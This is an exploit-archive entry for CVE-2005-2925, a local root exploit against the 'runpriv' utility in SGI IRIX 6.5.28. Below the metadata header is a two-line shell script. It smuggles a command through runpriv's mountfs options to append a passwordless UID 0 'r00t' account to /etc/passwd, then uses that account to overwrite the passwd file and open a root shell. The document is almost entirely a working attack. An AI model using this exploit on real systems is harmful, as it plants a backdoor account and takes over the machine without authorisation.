SGI IRIX 6.5.28 - 'runpriv' Design Error
Author: anonymous
Type: local
Platform: irix
Date added: 2005-10-09
Date updated: 2017-10-10
Verified: 1
Codes: OSVDB-19907; CVE-2005-2925
Raw file: 1577.sh

#!/bin/sh
# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312

/usr/sysadm/bin/runpriv mountfs -s test -d / -o | "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ; mv /tmp/passwd123 /etc/passwd ; chmod 644 /etc/passwd ; su"

# milw0rm.com [2005-10-10]